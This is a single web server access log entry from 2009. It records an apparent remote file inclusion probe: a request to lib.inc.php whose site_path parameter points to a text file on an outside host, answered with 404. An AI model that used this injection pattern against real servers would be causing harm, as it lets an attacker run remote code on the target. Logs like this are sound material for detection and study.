83.98.209.71 - - [01/Jul/2009:06:46:54 -0400] "GET /include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
